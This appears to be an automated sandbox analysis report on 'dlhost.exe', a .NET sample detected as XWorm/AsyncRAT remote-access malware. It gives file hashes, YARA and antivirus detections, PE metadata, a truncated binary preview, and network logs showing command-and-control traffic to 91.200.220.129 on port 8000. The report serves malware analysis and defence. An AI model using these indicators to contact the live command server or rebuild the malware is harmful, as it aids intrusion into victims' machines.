                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ak1pn3b.w3o.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23mtkc1v.gk4.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cpdrz4u.vtz.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cavedjpm.xel.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cla4agx4.1o0.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0prxrea.mxr.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcelkw4w.q5z.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwoyhlub.h1u.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ie5s2j0k.mgi.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgba5qov.hqs.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4pteq0f.ilr.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1aifou4.tqy.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\dlhost.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\dlhost.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):74752
                                                              Entropy (8bit):5.979680936480482
                                                              Encrypted:false
                                                              SSDEEP:1536:g+nXz4QD6J6XDtT5rz+jR6iAb+BmK/g6F63HQOl/av:Xnnj15zC8iAbgaHQOdav
                                                              MD5:3A9A50E33AAE389D9D1A718047BE1AAB
                                                              SHA1:88B1E5988A7822449E2A64FA24932AE569490665
                                                              SHA-256:CD30142176CCD3F4BE40617E7CC825FFF1737EEE4D5B1F64F58ECF101E58134B
                                                              SHA-512:E467DADF2C575C918550431AA307755815A863F9332D612ACB15B72BD4772BC042DFE03F107324CD070A9DDCEC666CC9E0ABD4C96DA68E5FBDDE6E7CF1865665
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\dlhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\dlhost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\dlhost.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                              • Antivirus: Virustotal, Detection: 76%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg.............................8... ...@....@.. ....................................@.................................<8..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................p8......H........V..........&.....................................................(....*.r...p*. ..r.*..(....*.r1..p*. ...*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. ...*.r-..p*. .x!.*.r...p*. .W..*.r...p*..((...*.r...p*. ..e.*.r...p*. je..*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(P...*&(....&+.*.+5s`... .... .'..oa...(*...~....-.([...(Q...~....ob...&.-.*.r...p*. *p{.*.r...p*. .i..*.rp..p*. ..e.*.r...p*. ....*.r...p*. m...*.rl..p*. ....*.r...p*. .(T.*.r...p

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):5.979680936480482
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:dlhost.exe
                                                              File size:74'752 bytes
                                                              MD5:3a9a50e33aae389d9d1a718047be1aab
                                                              SHA1:88b1e5988a7822449e2a64fa24932ae569490665
                                                              SHA256:cd30142176ccd3f4be40617e7cc825fff1737eee4d5b1f64f58ecf101e58134b
                                                              SHA512:e467dadf2c575c918550431aa307755815a863f9332d612acb15b72bd4772bc042dfe03f107324cd070a9ddcec666cc9e0abd4c96da68e5fbdde6e7cf1865665
                                                              SSDEEP:1536:g+nXz4QD6J6XDtT5rz+jR6iAb+BmK/g6F63HQOl/av:Xnnj15zC8iAbgaHQOdav
                                                              TLSH:BA736D147BEA4128F1FF5FB49DF531A6CA3AB6636D03951F24C4024B1A23D86CC516FA
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg.............................8... ...@....@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x41388e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6762B590 [Wed Dec 18 11:44:16 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1383c0x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4ce.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x118940x11a00a2bfd0dd0161e2014227e7a346d64d82False0.619639295212766data6.050386375534312IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x140000x4ce0x6005c396f6937732c9c647e4386c0da3b3eFalse0.373046875data3.7151158162194333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x160000xc0x2007250212f4886656419c20a7ba05e3d60False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x140a00x244data0.4689655172413793
                                                              RT_MANIFEST0x142e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-19T08:15:20.587797+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.54983091.200.220.1298000TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 08:14:00.573755026 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:14:00.693387985 CET8049704208.95.112.1192.168.2.5
                                                              Dec 19, 2024 08:14:00.693613052 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:14:00.694667101 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:14:00.814733982 CET8049704208.95.112.1192.168.2.5
                                                              Dec 19, 2024 08:14:01.856811047 CET8049704208.95.112.1192.168.2.5
                                                              Dec 19, 2024 08:14:01.899739027 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:14:36.869257927 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:36.869297028 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:36.869405031 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:36.896145105 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:36.896162987 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.123895884 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.123995066 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:38.127934933 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:38.127948046 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.128201008 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.169776917 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:38.215325117 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.932410002 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.932641029 CET44349755104.20.4.235192.168.2.5
                                                              Dec 19, 2024 08:14:38.932858944 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:38.989470005 CET49755443192.168.2.5104.20.4.235
                                                              Dec 19, 2024 08:14:43.969156027 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:14:44.088779926 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:14:44.092613935 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:14:44.120379925 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:14:44.239891052 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:14:54.418561935 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:14:54.538098097 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:00.294759035 CET8049704208.95.112.1192.168.2.5
                                                              Dec 19, 2024 08:15:00.294872046 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:15:04.713062048 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:04.832858086 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:05.983717918 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:05.983818054 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:09.681231022 CET497718000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:09.682117939 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:09.801151991 CET80004977191.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:09.801687002 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:09.801810026 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:09.832366943 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:09.952332020 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:20.587796926 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:20.707568884 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:31.353425026 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:31.473071098 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:31.687534094 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:31.687777996 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:32.743854046 CET498308000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:32.744822025 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:32.863570929 CET80004983091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:32.864537954 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:32.864741087 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:32.887819052 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:33.007489920 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:41.916134119 CET4970480192.168.2.5208.95.112.1
                                                              Dec 19, 2024 08:15:42.037851095 CET8049704208.95.112.1192.168.2.5
                                                              Dec 19, 2024 08:15:47.595504045 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:47.715229034 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:47.715296030 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:47.834978104 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:47.835036993 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:47.954616070 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:47.954659939 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:48.074385881 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:49.190468073 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:49.310146093 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:50.146620035 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:50.266338110 CET80004983991.200.220.129192.168.2.5
